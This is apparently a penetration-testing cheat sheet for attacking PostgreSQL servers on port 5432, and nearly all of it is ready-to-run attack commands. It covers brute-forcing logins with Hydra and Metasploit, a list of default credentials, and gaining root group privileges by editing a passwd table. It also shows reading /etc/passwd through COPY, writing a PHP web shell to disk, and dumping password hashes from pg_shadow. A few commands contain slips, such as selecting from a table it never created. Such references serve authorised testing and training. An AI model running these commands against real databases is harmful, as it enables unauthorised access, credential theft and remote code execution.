Postgres Pentest - Port 5432

nmap Scanning
nmap -sC -sV --script vuln,vulners --script-args mincvss=7.0 -p5432,5433 -Pn 10.10.10.10 
 #make sure to check for vulnerable versions

Bruteforcing Postgres Creds

#Using Metasploit
use auxiliary/scanner/postgres/postgres_login

#using Hydra
hydra -L /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt -P /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt 10.10.10.10 postgres

Default Username & Passwords:
● postgres : postgres
● postgres : password
● postgres : admin
● admin : admin
● admin : password
  root : root

#or for a better wordlist 
cp /usr/share/wordlists/seclists/Passwords/Default-Credentials/postgres-betterdefaultpasslist.txt .
cat postgres-betterdefaultpasslist.txt | cut -f1 -d":" > user.txt
cat postgres-betterdefaultpasslist.txt  | cut -f2 -d":" > pass.txt

Accessing remote Postgresql server

psql -h 10.10.10.10 -U USERNAME
psql -h <host> -U <username> -d <database>

PrivEsc when Postgresql Is Running As Root

psql -h 127.0.0.1 -d DB_NAME -U unixusrmgr  //Enter Password later 

\dt    \\List Tables
\dp     \\Get DB privileges
select * from table_name; \\ Check Home Directory (just in case) 

Example to Update a value in all rows:
update table_name set gid=0 where gid=1001; \Giving Root Privs

or 
insert into passwd_table (username,passwd,gid,homedir) values ('freak','openssl_encrypted password',0,'/');

Reading files via Postgres
use auxiliary/admin/postgres/postgres_readfile

#Downloading a file 
> create table new(file TEXT);
COPY new FROM '/etc/passwd';
select * from hack;

#Uploading a file
create table new(put TEXT);
INSERT INTO new(put) VALUES('<?php @system("$_GET[cmd]");?>');
COPY new(put) TO '/tmp/temp.php';

Dumping Hashes

auxiliary/admin/postgres/postgres_sql
>select usename, passwd from pg_shadow;

auxiliary/scanner/postgres/postgres_hashdump